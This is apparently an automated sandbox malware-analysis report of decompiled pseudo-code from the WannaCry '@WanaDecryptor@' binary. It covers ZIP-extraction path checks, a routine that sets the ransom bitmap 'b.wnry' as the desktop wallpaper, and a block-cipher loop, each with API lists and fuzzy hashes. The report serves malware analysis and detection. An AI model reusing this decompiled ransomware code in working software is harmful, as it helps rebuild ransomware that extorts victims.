                                                      														goto L21;
                                                      													}
                                                      												}
                                                      												_push("/../");
                                                      												_push(_t321);
                                                      												L004132C4();
                                                      												_t353 = _t353 + 8;
                                                      												__eflags = _t157;
                                                      												if(_t157 != 0) {
                                                      													_t43 = _t157 + 4; // 0x4
                                                      													_t321 = _t43;
                                                      													while(1) {
                                                      														_t157 =  *_t321;
                                                      														__eflags = _t157;
                                                      														if(_t157 == 0) {
                                                      															goto L23;
                                                      														}
                                                      														goto L21;
                                                      													}
                                                      													goto L23;
                                                      												}
                                                      												_push("/..\\");
                                                      												_push(_t321);
                                                      												L004132C4();
                                                      												_t353 = _t353 + 8;
                                                      												__eflags = _t157;
                                                      												if(_t157 != 0) {
                                                      													_t44 = _t157 + 4; // 0x4
                                                      													_t321 = _t44;
                                                      													continue;
                                                      												}
                                                      												asm("repne scasb");
                                                      												_t338 = _t321 -  !0xffffffff;
                                                      												_t297 =  *(_t353 + 0x70);
                                                      												_t160 = memcpy(_t346 + 4, _t338,  !0xffffffff >> 2 << 2);
                                                      												_t354 = _t353 + 0xc;
                                                      												 *((char*)(_t354 + 0x13)) = 0;
                                                      												_t162 = memcpy(_t338 + 0x175b75a, _t338, _t160 & 0x00000003);
                                                      												_t355 = _t354 + 0xc;
                                                      												_t164 = _t162 >> 0x0000001e & 0x00000001;
                                                      												_t264 =  !(_t297 >> 0x17) & 0x00000001;
                                                      												_t340 =  *(_t355 + 0x3c) >> 8;
                                                      												__eflags = _t340;
                                                      												 *(_t355 + 0x12) = 0;
                                                      												_t234 = 1;
                                                      												if(_t340 == 0) {
                                                      													L39:
                                                      													_t264 = _t297 & 0x00000001;
                                                      													 *(_t355 + 0x13) = _t297 >> 0x00000001 & 0x00000001;
                                                      													 *(_t355 + 0x12) = _t297 >> 0x00000002 & 0x00000001;
                                                      													_t164 = _t297 >> 0x00000004 & 0x00000001;
                                                      													_t299 = _t297 >> 0x00000005 & 0x00000001;
                                                      													__eflags = _t299;
                                                      													_t234 = _t299;
                                                      												} else {
                                                      													__eflags = _t340 - 7;
                                                      													if(_t340 == 7) {
                                                      														goto L39;
                                                      													} else {
                                                      														__eflags = _t340 - 0xb;
                                                      														if(_t340 == 0xb) {
                                                      															goto L39;
                                                      														} else {
                                                      															__eflags = _t340 - 0xe;
                                                      															if(_t340 == 0xe) {
                                                      																goto L39;
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      												_t341 = 0;
                                                      												__eflags = _t164;
                                                      												 *(_t346 + 0x108) = 0;
                                                      												if(_t164 != 0) {
                                                      													 *(_t346 + 0x108) = 0x10;
                                                      												}
                                                      												__eflags = _t234;
                                                      												if(_t234 != 0) {
                                                      													_t219 =  *(_t346 + 0x108) | 0x00000020;
                                                      													__eflags = _t219;
                                                      													 *(_t346 + 0x108) = _t219;
                                                      												}
                                                      												__eflags =  *(_t355 + 0x13);
                                                      												if( *(_t355 + 0x13) != 0) {
                                                      													_t217 =  *(_t346 + 0x108) | 0x00000002;
                                                      													__eflags = _t217;
                                                      													 *(_t346 + 0x108) = _t217;
                                                      												}
                                                      												__eflags = _t264;
                                                      												if(_t264 != 0) {
                                                      													_t215 =  *(_t346 + 0x108) | 0x00000001;
                                                      													__eflags = _t215;
                                                      													 *(_t346 + 0x108) = _t215;
                                                      												}
                                                      												__eflags =  *(_t355 + 0x12);
                                                      												if( *(_t355 + 0x12) != 0) {
                                                      													_t63 = _t346 + 0x108;
                                                      													 *_t63 =  *(_t346 + 0x108) | 0x00000004;
                                                      													__eflags =  *_t63;
                                                      												}
                                                      												_t300 =  *((intOrPtr*)(_t355 + 0x58));
                                                      												 *((intOrPtr*)(_t346 + 0x124)) =  *((intOrPtr*)(_t355 + 0x54));
                                                      												 *((intOrPtr*)(_t346 + 0x128)) = _t300;
                                                      												_t177 = E00411B80( *(_t355 + 0x4c) >> 0x10,  *(_t355 + 0x4c));
                                                      												_t356 = _t355 + 8;
                                                      												 *(_t356 + 0x30) = _t177;
                                                      												 *((intOrPtr*)(_t356 + 0x3c)) = _t300;
                                                      												LocalFileTimeToFileTime(_t356 + 0x30, _t356 + 0x28);
                                                      												_t180 =  *(_t356 + 0x28);
                                                      												_t269 =  *((intOrPtr*)(_t356 + 0x2c));
                                                      												 *(_t346 + 0x10c) = _t180;
                                                      												 *(_t346 + 0x114) = _t180;
                                                      												 *(_t346 + 0x11c) = _t180;
                                                      												__eflags =  *((intOrPtr*)(_t356 + 0x14)) - 4;
                                                      												 *((intOrPtr*)(_t346 + 0x110)) = _t269;
                                                      												 *((intOrPtr*)(_t346 + 0x118)) = _t269;
                                                      												 *((intOrPtr*)(_t346 + 0x120)) = _t269;
                                                      												if( *((intOrPtr*)(_t356 + 0x14)) <= 4) {
                                                      													_t329 =  *(_t356 + 0x1c);
                                                      												} else {
                                                      													_t329 =  *(_t356 + 0x1c);
                                                      													 *((char*)(_t356 + 0x1a)) = 0;
                                                      													do {
                                                      														 *((char*)(_t356 + 0x19)) =  *((intOrPtr*)(_t329 + _t341 + 1));
                                                      														 *(_t356 + 0x18) =  *((intOrPtr*)(_t341 + _t329));
                                                      														_t273 = "UT";
                                                      														_t186 = _t356 + 0x18;
                                                      														while(1) {
                                                      															_t235 =  *_t186;
                                                      															_t303 = _t235;
                                                      															__eflags = _t235 -  *_t273;
                                                      															if(_t235 !=  *_t273) {
                                                      																break;
                                                      															}
                                                      															__eflags = _t303;
                                                      															if(_t303 == 0) {
                                                      																L57:
                                                      																_t186 = 0;
                                                      															} else {
                                                      																_t239 =  *((intOrPtr*)(_t186 + 1));
                                                      																_t311 = _t239;
                                                      																_t92 = _t273 + 1; // 0x2f000054
                                                      																__eflags = _t239 -  *_t92;
                                                      																if(_t239 !=  *_t92) {
                                                      																	break;
                                                      																} else {
                                                      																	_t186 = _t186 + 2;
                                                      																	_t273 = _t273 + 2;
                                                      																	__eflags = _t311;
                                                      																	if(_t311 != 0) {
                                                      																		continue;
                                                      																	} else {
                                                      																		goto L57;
                                                      																	}
                                                      																}
                                                      															}
                                                      															L59:
                                                      															__eflags = _t186;
                                                      															if(_t186 == 0) {
                                                      																_t188 =  *((intOrPtr*)(_t341 + _t329 + 4));
                                                      																_t343 = _t341 + 5;
                                                      																_t276 = 1;
                                                      																__eflags = _t188 & 0x00000001;
                                                      																 *((char*)(_t356 + 0x12)) = 1;
                                                      																if((_t188 & 0x00000001) != 0) {
                                                      																	_t309 =  *((intOrPtr*)(_t343 + _t329));
                                                      																	_t343 = _t343 + 4;
                                                      																	__eflags = 0 << 8;
                                                      																	_t212 = E00411B50(_t309, 0 << 8 << 8);
                                                      																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
                                                      																	 *(_t346 + 0x11c) = _t212;
                                                      																	_t356 = _t356 + 4;
                                                      																	 *((intOrPtr*)(_t346 + 0x120)) = 0;
                                                      																}
                                                      																__eflags = 1;
                                                      																if(1 != 0) {
                                                      																	_t307 =  *((intOrPtr*)(_t343 + _t329));
                                                      																	_t343 = _t343 + 4;
                                                      																	__eflags = 0 << 8;
                                                      																	_t204 = E00411B50(_t307, 0 << 8 << 8);
                                                      																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
                                                      																	 *(_t346 + 0x10c) = _t204;
                                                      																	_t356 = _t356 + 4;
                                                      																	 *((intOrPtr*)(_t346 + 0x110)) = 0;
                                                      																}
                                                      																__eflags = _t276;
                                                      																if(_t276 != 0) {
                                                      																	 *(_t346 + 0x114) = E00411B50( *((intOrPtr*)(_t343 + _t329)), 0 << 8 << 8);
                                                      																	_t356 = _t356 + 4;
                                                      																	 *((intOrPtr*)(_t346 + 0x118)) = 0;
                                                      																}
                                                      															} else {
                                                      																goto L60;
                                                      															}
                                                      															goto L69;
                                                      														}
                                                      														asm("sbb eax, eax");
                                                      														asm("sbb eax, 0xffffffff");
                                                      														goto L59;
                                                      														L60:
                                                      														_t341 = _t341 + 4;
                                                      														__eflags = _t341 + 4 -  *((intOrPtr*)(_t356 + 0x14));
                                                      													} while (_t341 + 4 <  *((intOrPtr*)(_t356 + 0x14)));
                                                      												}
                                                      												L69:
                                                      												__eflags = _t329;
                                                      												if(_t329 != 0) {
                                                      													_push(_t329);
                                                      													L00412C98();
                                                      													_t356 = _t356 + 4;
                                                      												}
                                                      												_t182 =  *((intOrPtr*)(_t356 + 0x20));
                                                      												memcpy(_t182 + 8, _t346, 0x4b << 2);
                                                      												 *((intOrPtr*)(_t182 + 0x134)) =  *((intOrPtr*)(_t356 + 0x2a0));
                                                      												__eflags = 0;
                                                      												return 0;
                                                      												goto L73;
                                                      											}
                                                      										} else {
                                                      											_push(_t313);
                                                      											L00412C98();
                                                      											return 0x800;
                                                      										}
                                                      									} else {
                                                      										return 0x800;
                                                      									}
                                                      								} else {
                                                      									return 0x700;
                                                      								}
                                                      							} else {
                                                      								goto L8;
                                                      							}
                                                      						} else {
                                                      							if(_t312 == _t232) {
                                                      								L8:
                                                      								_t226 =  *((intOrPtr*)(_t348 + 0x28c));
                                                      								 *_t226 =  *((intOrPtr*)( *_t336 + 4));
                                                      								 *((char*)(_t226 + 4)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x108)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x10c)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x110)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x114)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x118)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x11c)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x120)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x124)) = 0;
                                                      								 *((intOrPtr*)(_t226 + 0x128)) = 0;
                                                      								__eflags = 0;
                                                      								return 0;
                                                      							} else {
                                                      								return memcpy( *(_t348 + 0x298), _t336 + 8, 0x4b << 2);
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				L73:
                                                      			}

                                                      0x00411ef0
                                                      0x00411ef0
                                                      0x00411ef2
                                                      0x00411ef4
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00411ee0
                                                      0x00411ef7
                                                      0x00411ef9
                                                      0x00411efb
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00411ee0
                                                      0x00411efe
                                                      0x00411f03
                                                      0x00411f04
                                                      0x00411f09
                                                      0x00411f0c
                                                      0x00411f0e
                                                      0x00411f10
                                                      0x00411f10
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00411ee0
                                                      0x00411f15
                                                      0x00411f1a
                                                      0x00411f1b
                                                      0x00411f20
                                                      0x00411f23
                                                      0x00411f25
                                                      0x00411f27
                                                      0x00411f27
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00411ee0
                                                      0x00411f2c
                                                      0x00411f31
                                                      0x00411f32
                                                      0x00411f37
                                                      0x00411f3a
                                                      0x00411f3c
                                                      0x00411f3e
                                                      0x00411f3e
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00411ee0
                                                      0x00411f43
                                                      0x00411f48
                                                      0x00411f49
                                                      0x00411f4e
                                                      0x00411f51
                                                      0x00411f53
                                                      0x00411f55
                                                      0x00411f55
                                                      0x00000000
                                                      0x00411f55
                                                      0x00411f5f
                                                      0x00411f6a
                                                      0x00411f6e
                                                      0x00411f75
                                                      0x00411f75
                                                      0x00411f7e
                                                      0x00411f83
                                                      0x00411f83
                                                      0x00411f93
                                                      0x00411f95
                                                      0x00411f98
                                                      0x00411f98
                                                      0x00411f9b
                                                      0x00411fa0
                                                      0x00411fa2
                                                      0x00411fb3
                                                      0x00411fbb
                                                      0x00411fbe
                                                      0x00411fc9
                                                      0x00411fd5
                                                      0x00411fd7
                                                      0x00411fd7
                                                      0x00411fda
                                                      0x00411fa4
                                                      0x00411fa4
                                                      0x00411fa7
                                                      0x00000000
                                                      0x00411fa9
                                                      0x00411fa9
                                                      0x00411fac
                                                      0x00000000
                                                      0x00411fae
                                                      0x00411fae
                                                      0x00411fb1
                                                      0x00000000
                                                      0x00000000
                                                      0x00411fb1
                                                      0x00411fac
                                                      0x00411fa7
                                                      0x00411fdc
                                                      0x00411fde
                                                      0x00411fe0
                                                      0x00411fe6
                                                      0x00411fe8
                                                      0x00411fe8
                                                      0x00411ff2
                                                      0x00411ff4
                                                      0x00411ffc
                                                      0x00411ffc
                                                      0x00411ffe
                                                      0x00411ffe
                                                      0x00412008
                                                      0x0041200a
                                                      0x00412012
                                                      0x00412012
                                                      0x00412014
                                                      0x00412014
                                                      0x0041201a
                                                      0x0041201c
                                                      0x00412024
                                                      0x00412024
                                                      0x00412026
                                                      0x00412026
                                                      0x00412035
                                                      0x00412037
                                                      0x00412039
                                                      0x00412039
                                                      0x00412039
                                                      0x00412039
                                                      0x00412043
                                                      0x00412047
                                                      0x00412058
                                                      0x0041205e
                                                      0x00412063
                                                      0x00412066
                                                      0x00412074
                                                      0x00412078
                                                      0x0041207e
                                                      0x00412082
                                                      0x00412086
                                                      0x0041208c
                                                      0x00412092
                                                      0x0041209c
                                                      0x0041209e
                                                      0x004120a4
                                                      0x004120aa
                                                      0x004120b0
                                                      0x004121f2
                                                      0x004120b6
                                                      0x004120b6
                                                      0x004120ba
                                                      0x004120bf
                                                      0x004120c6
                                                      0x004120ca
                                                      0x004120ce
                                                      0x004120d3
                                                      0x004120d7
                                                      0x004120d7
                                                      0x004120d9
                                                      0x004120db
                                                      0x004120dd
                                                      0x00000000
                                                      0x00000000
                                                      0x004120df
                                                      0x004120e1
                                                      0x004120f7
                                                      0x004120f7
                                                      0x004120e3
                                                      0x004120e3
                                                      0x004120e6
                                                      0x004120e8
                                                      0x004120e8
                                                      0x004120eb
                                                      0x00000000
                                                      0x004120ed
                                                      0x004120ed
                                                      0x004120f0
                                                      0x004120f3
                                                      0x004120f5
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004120f5
                                                      0x004120eb
                                                      0x00412100
                                                      0x00412100
                                                      0x00412102
                                                      0x00412120
                                                      0x00412124
                                                      0x00412133
                                                      0x00412136
                                                      0x00412138
                                                      0x0041213c
                                                      0x00412150
                                                      0x00412153
                                                      0x0041215e
                                                      0x00412161
                                                      0x00412166
                                                      0x0041216a
                                                      0x00412170
                                                      0x00412173
                                                      0x00412173
                                                      0x00412179
                                                      0x0041217b
                                                      0x0041218f
                                                      0x00412192
                                                      0x0041219d
                                                      0x004121a0
                                                      0x004121a5
                                                      0x004121a9
                                                      0x004121af
                                                      0x004121b2
                                                      0x004121b2
                                                      0x004121b8
                                                      0x004121ba
                                                      0x004121e1
                                                      0x004121e7
                                                      0x004121ea
                                                      0x004121ea
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00412102
                                                      0x004120fb
                                                      0x004120fd
                                                      0x00000000
                                                      0x00412104
                                                      0x0041210e
                                                      0x00412115
                                                      0x00412115
                                                      0x00412119
                                                      0x004121f6
                                                      0x004121f6
                                                      0x004121f8
                                                      0x004121fa
                                                      0x004121fb
                                                      0x00412200
                                                      0x00412200
                                                      0x00412203
                                                      0x00412214
                                                      0x0041221f
                                                      0x00412225
                                                      0x0041222e
                                                      0x00000000
                                                      0x0041222e
                                                      0x00411e83
                                                      0x00411e83
                                                      0x00411e84
                                                      0x00411e9a
                                                      0x00411e9a
                                                      0x00411e47
                                                      0x00411e53
                                                      0x00411e53
                                                      0x00411e1e
                                                      0x00411e2a
                                                      0x00411e2a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411d37
                                                      0x00411d39
                                                      0x00411d5e
                                                      0x00411d66
                                                      0x00411d6d
                                                      0x00411d71
                                                      0x00411d74
                                                      0x00411d7a
                                                      0x00411d80
                                                      0x00411d86
                                                      0x00411d8c
                                                      0x00411d92
                                                      0x00411d98
                                                      0x00411d9e
                                                      0x00411da4
                                                      0x00411daa
                                                      0x00411db2
                                                      0x00411d3b
                                                      0x00411d57
                                                      0x00411d57
                                                      0x00411d39
                                                      0x00411d35
                                                      0x00411d16
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /../$/..\$\../$\..\
                                                      • API String ID: 0-3885502717
                                                      • Opcode ID: 609ee301a0957fc1d178a82fd6ad0030074ae851484ad2f13760bdfbe56840fa
                                                      • Instruction ID: 7e1d0207c54717434a39a3e8c1400c014a600b9e0d7efc558eb6bad2cf7342ef
                                                      • Opcode Fuzzy Hash: 609ee301a0957fc1d178a82fd6ad0030074ae851484ad2f13760bdfbe56840fa
                                                      • Instruction Fuzzy Hash: FAF138756043414FC724CF2888817EBBBE1ABD8304F18892EEDD9CB351D679E989C799
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E00407E80() {
                                                      				void _v518;
                                                      				short _v520;
                                                      				short _v540;
                                                      				void _v1038;
                                                      				char _v1040;
                                                      				long _v1060;
                                                      				void _v1558;
                                                      				short _v1560;
                                                      				long _v1580;
                                                      				int _t23;
                                                      				short _t39;
                                                      				void* _t42;
                                                      				void* _t54;
                                                      				void* _t55;
                                                      
                                                      				_t39 =  *0x42179c; // 0x0
                                                      				_v1040 = _t39;
                                                      				memset( &_v1038, 0, 0x81 << 2);
                                                      				asm("stosw");
                                                      				_v1560 = _t39;
                                                      				memset( &_v1558, 0, 0x81 << 2);
                                                      				asm("stosw");
                                                      				_v520 = _t39;
                                                      				memset( &_v518, 0, 0x81 << 2);
                                                      				asm("stosw");
                                                      				__imp__SHGetFolderPathW(0, 0, 0, 0,  &_v1040, _t42);
                                                      				_t23 = wcslen( &_v1060);
                                                      				_t54 =  &_v1560 + 0x28;
                                                      				if(_t23 != 0) {
                                                      					_push(L"@WanaDecryptor@.bmp");
                                                      					swprintf( &_v1580, L"%s\\%s",  &_v1060);
                                                      					_t55 = _t54 + 0x10;
                                                      					MultiByteToWideChar(0, 0, "b.wnry", 0xffffffff,  &_v540, 0x103);
                                                      					CopyFileW( &_v540, _t55, 0);
                                                      					return SystemParametersInfoW(0x14, 0, _t55, 1);
                                                      				} else {
                                                      					return _t23;
                                                      				}
                                                      			}


















                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
                                                      • wcslen.MSVCRT ref: 00407EF4
                                                      • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 00407F56
                                                      • SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharCopyFileFolderInfoMultiParametersPathSystemWideswprintfwcslen
                                                      • String ID: %s\%s$@WanaDecryptor@.bmp$b.wnry
                                                      • API String ID: 13424474-2236924158
                                                      • Opcode ID: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                                      • Instruction ID: 08a18ced9c3675786ff634b79335ab73d5ba80fa93599351ce40df3d96d25247
                                                      • Opcode Fuzzy Hash: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                                      • Instruction Fuzzy Hash: 7E21F075204304BAE36087A4CC05FE773AAAFD4700F508938B359961E1EAB16154875B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 72%
                                                      			E004067F0(void* __ecx) {
                                                      				signed int _v84;
                                                      				void* _v88;
                                                      				intOrPtr _v92;
                                                      				intOrPtr _v96;
                                                      				intOrPtr _v100;
                                                      				char _v104;
                                                      				int _t16;
                                                      				int _t21;
                                                      				int _t22;
                                                      				int _t37;
                                                      				struct tagRECT* _t48;
                                                      				void* _t56;
                                                      
                                                      				_t56 = __ecx;
                                                      				_t16 = IsIconic( *(__ecx + 0x20));
                                                      				if(_t16 == 0) {
                                                      					L00412CBC();
                                                      					return _t16;
                                                      				} else {
                                                      					_push(_t56);
                                                      					L00412DD0();
                                                      					asm("sbb eax, eax");
                                                      					SendMessageA( *(_t56 + 0x20), 0x27,  ~( &_v88) & _v84, 0);
                                                      					_t21 = GetSystemMetrics(0xb);
                                                      					_t22 = GetSystemMetrics(0xc);
                                                      					_t48 =  &_v104;
                                                      					GetClientRect( *(_t56 + 0x20), _t48);
                                                      					asm("cdq");
                                                      					asm("cdq");
                                                      					_t37 = DrawIcon(_v84, _v96 - _v104 - _t21 + 1 - _v104 >> 1, _v92 - _v100 - _t22 + 1 - _t48 >> 1,  *(_t56 + 0x82c));
                                                      					L00412DB8();
                                                      					return _t37;
                                                      				}
                                                      			}

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
                                                      • String ID:
                                                      • API String ID: 1397574227-0
                                                      • Opcode ID: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
                                                      • Instruction ID: db6533e43e067d2e1cb08ff7c7a85c8aaf9a8b82d3d45c58550572c7a5875683
                                                      • Opcode Fuzzy Hash: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
                                                      • Instruction Fuzzy Hash: 45117F712146069FC214DF38DD49DEBB7E9FBC8304F488A2DF58AC3290DA74E8058B95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 65%
                                                      			E0040B3C0(void* __ebx, void* __ecx, void* __ebp, void* _a4, signed int _a8, signed int _a12, void* _a16) {
                                                      				void* _v4;
                                                      				void* _v12;
                                                      				char _v16;
                                                      				void* _v20;
                                                      				char _v24;
                                                      				struct HWND__* _v32;
                                                      				WCHAR* _v36;
                                                      				struct HWND__* _t90;
                                                      				signed int* _t100;
                                                      				signed int _t102;
                                                      				signed int _t105;
                                                      				signed int* _t109;
                                                      				signed int _t113;
                                                      				signed int _t114;
                                                      				signed int _t121;
                                                      				void* _t124;
                                                      				signed int _t130;
                                                      				signed int _t132;
                                                      				signed int _t138;
                                                      				signed int _t143;
                                                      				signed int _t152;
                                                      				signed int _t157;
                                                      				void* _t185;
                                                      				void* _t188;
                                                      				signed int* _t191;
                                                      				void* _t204;
                                                      				signed int _t206;
                                                      				struct HWND__* _t207;
                                                      				void* _t211;
                                                      				void* _t212;
                                                      				void* _t217;
                                                      				void* _t218;
                                                      				signed int _t221;
                                                      				void* _t224;
                                                      				signed int* _t226;
                                                      				void* _t227;
                                                      				void* _t228;
                                                      
                                                      				_t228 = _t227 - 0xc;
                                                      				_t124 = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                      					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                                      					_push(0x41c9c0);
                                                      					_push( &_v16);
                                                      					L004130FC();
                                                      				}
                                                      				_t206 = _a12;
                                                      				_t185 = 0;
                                                      				if(_t206 == 0) {
                                                      					L26:
                                                      					__imp__??0exception@@QAE@ABQBD@Z(0x4213ac);
                                                      					_push(0x41c9c0);
                                                      					_push( &_v16);
                                                      					L004130FC();
                                                      					_push(_t206);
                                                      					_t90 = FindWindowW(0, _v36); // executed
                                                      					_t207 = _t90;
                                                      					if(_t207 != 0) {
                                                      						_push(_t185);
                                                      						ShowWindow(_t207, 5);
                                                      						SetWindowPos(_t207, 0xffffffff, 0, 0, 0, 0, 0x43);
                                                      						SetWindowPos(_t207, 0xfffffffe, 0, 0, 0, 0, 0x43);
                                                      						SetForegroundWindow(_t207);
                                                      						SetFocus(_t207);
                                                      						SetActiveWindow(_t207);
                                                      						BringWindowToTop(_t207);
                                                      						_t90 = _v32;
                                                      						if(_t90 != 0) {
                                                      							ExitProcess(0);
                                                      						}
                                                      					}
                                                      					return _t90;
                                                      				} else {
                                                      					_t130 =  *(_t124 + 0x3cc);
                                                      					if(_t206 % _t130 != 0) {
                                                      						goto L26;
                                                      					} else {
                                                      						_t100 = _a16;
                                                      						if(_t100 != 1) {
                                                      							L13:
                                                      							_a16 = _t185;
                                                      							if(_t100 != 2) {
                                                      								L23:
                                                      								_t102 = _t206 / _t130;
                                                      								_t188 = _a4;
                                                      								_t221 = _a8;
                                                      								if(_t102 <= 0) {
                                                      									goto L11;
                                                      								} else {
                                                      									do {
                                                      										_push(_t221);
                                                      										_push(_t188);
                                                      										E0040B0C0(_t124);
                                                      										_t132 =  *(_t124 + 0x3cc);
                                                      										_t188 = _t188 + _t132;
                                                      										_t221 = _t221 + _t132;
                                                      										_a8 = _a8 + 1;
                                                      										_t105 = _t206 / _t132;
                                                      									} while (_a8 < _t105);
                                                      									return _t105;
                                                      								}
                                                      							} else {
                                                      								_t102 = _t206 / _t130;
                                                      								_t191 = _a8;
                                                      								_t224 = _a4;
                                                      								_a4 = _t191;
                                                      								if(_t102 <= 0) {
                                                      									goto L11;
                                                      								} else {
                                                      									while(1) {
                                                      										_t50 = _t124 + 0x3f0; // 0x444
                                                      										_push(_t191);
                                                      										E0040ADC0(_t124);
                                                      										_t109 = _t191;
                                                      										if( *((intOrPtr*)(_t124 + 4)) == 0) {
                                                      											break;
                                                      										}
                                                      										_t211 = 0;
                                                      										if( *(_t124 + 0x3cc) > 0) {
                                                      											do {
                                                      												 *_t109 =  *_t109 ^  *(_t211 + _t224);
                                                      												_t109 =  &(_t109[0]);
                                                      												_t211 = _t211 + 1;
                                                      											} while (_t211 <  *(_t124 + 0x3cc));
                                                      										}
                                                      										_t212 = _t224;
                                                      										_t56 = _t124 + 0x3f0; // 0x444
                                                      										_t138 =  *(_t124 + 0x3cc) >> 2;
                                                      										_t113 = memcpy(_t212 + _t138 + _t138, _t212, memcpy(_t56, _t212, _t138 << 2) & 0x00000003);
                                                      										_t228 = _t228 + 0x18;
                                                      										_t143 =  *(_t124 + 0x3cc);
                                                      										_t114 = _t113 / _t143;
                                                      										_t224 = _t224 + _t143;
                                                      										_v4 = _v4 + _t143;
                                                      										_t206 = _a8 + 1;
                                                      										_a8 = _t206;
                                                      										if(_t206 < _t114) {
                                                      											_t191 = _v4;
                                                      											continue;
                                                      										} else {
                                                      											return _t114;
                                                      										}
                                                      										goto L31;
                                                      									}
                                                      									__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                                      									_t130 =  &_v24;
                                                      									_push(0x41c9c0);
                                                      									_push(_t130);
                                                      									L004130FC();
                                                      									goto L23;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							_t102 = _t206 / _t130;
                                                      							_t226 = _a8;
                                                      							_a16 = 0;
                                                      							if(_t102 <= 0) {
                                                      								L11:
                                                      								return _t102;
